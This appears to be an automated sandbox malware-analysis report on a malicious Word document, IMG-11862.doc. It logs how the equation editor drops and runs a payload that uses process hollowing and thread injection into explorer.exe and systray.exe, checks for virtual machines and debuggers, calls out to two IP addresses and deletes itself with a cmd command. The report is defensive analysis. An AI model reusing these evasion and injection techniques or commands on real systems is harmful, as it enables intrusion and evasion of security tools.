File created: C:\Users\user\Desktop\~$G-11862.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC966.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................\|.......(.P.....................................................0.......................l.......p.<.......<.....			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ....................\|.<.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........p1........4.t...........0.......................&.................<.....			Jump to behavior

Source: C:\Users\Public\69577.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\69577.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\69577.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: IMG-11862.doc	Virustotal: Detection: 38%
Source: IMG-11862.doc	ReversingLabs: Detection: 24%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: unknown	Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\69577.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: IMG-11862.doc

Static file information: File size 1817663 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: systray.pdbB source: AddInProcess32.exe, 00000005.00000002.2158465105.0000000000464000.00000004.00000020.sdmp
Source:	Binary string: AddInProcess32.pdb}o source: 69577.exe, 00000004.00000003.2100576876.00000000062C3000.00000004.00000001.sdmp
Source:	Binary string: AddInProcess32.pdb source: 69577.exe, 00000004.00000003.2100576876.00000000062C3000.00000004.00000001.sdmp, AddInProcess32.exe
Source:	Binary string: systray.pdb source: AddInProcess32.exe, 00000005.00000002.2158465105.0000000000464000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, systray.exe

Data Obfuscation:

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041DD78 pushfd ; ret	5_2_0041DD79
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_004175C7 push ss; ret	5_2_004175C8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00414E16 pushfd ; retf	5_2_00414E1F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041CEB5 push eax; ret	5_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041CF6C push eax; ret	5_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041CF02 push eax; ret	5_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041CF0B push eax; ret	5_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00E02050 push es; ret	5_2_00E0250A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0084DFA1 push ecx; ret	5_2_0084DFB4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E1DFA1 push ecx; ret	7_2_01E1DFB4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_000975C7 push ss; ret	7_2_000975C8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_0009DD78 pushfd ; ret	7_2_0009DD79
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00094E16 pushfd ; retf	7_2_00094E1F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_0009CEB5 push eax; ret	7_2_0009CF08
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_0009CF0B push eax; ret	7_2_0009CF72
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_0009CF02 push eax; ret	7_2_0009CF08
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_0009CF6C push eax; ret	7_2_0009CF72

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-11862[1].pdf	Jump to dropped file
Source: C:\Users\Public\69577.exe	File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-11862[1].pdf

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\Public\69577.exe

File opened: C:\Users\Public\69577.exe\:Zone.Identifier read attributes | delete

Jump to behavior

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xEA

Source: C:\Users\Public\69577.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match

File source: Process Memory Space: 69577.exe PID: 1484, type: MEMORY

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 5_2_00409A90 rdtsc

5_2_00409A90

Source: C:\Users\Public\69577.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\69577.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2492	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2712	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 912	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2948	Thread sleep count: 185 > 30	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2352	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2980	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2980	Thread sleep time: -62000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 2412	Thread sleep time: -50000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: vmware svga
Source: explorer.exe, 00000006.00000002.2355507116.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2122292893.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: tpautoconnsvc#Microsoft Hyper-V
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: cmd.txtQEMUqemu
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: vmusrvc
Source: explorer.exe, 00000006.00000000.2122292893.0000000004234000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: vmsrvc
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: vmtools
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: vboxservicevbox)Microsoft Virtual PC
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: virtual-vmware pointing device
Source: explorer.exe, 00000006.00000002.2355542153.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}

Source: C:\Users\Public\69577.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 5_2_00409A90 rdtsc

5_2_00409A90

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 5_2_0040ACD0 LdrLoadDll,

5_2_0040ACD0

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00830080 mov ecx, dword ptr fs:[00000030h]	5_2_00830080
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008300EA mov eax, dword ptr fs:[00000030h]	5_2_008300EA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008526F8 mov eax, dword ptr fs:[00000030h]	5_2_008526F8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E226F8 mov eax, dword ptr fs:[00000030h]	7_2_01E226F8

Source: C:\Users\Public\69577.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\Public\69577.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 35.208.61.46 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 208.91.197.39 80			Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\Public\69577.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\69577.exe

Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Thread register set: target process: 1388	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Thread register set: target process: 1388	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Thread register set: target process: 1388	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Section unmapped: C:\Windows\SysWOW64\systray.exe base address: C0000

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\Public\69577.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\Public\69577.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Users\Public\69577.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 7EFDE008	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'	Jump to behavior

Source: explorer.exe, 00000006.00000002.2355833533.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
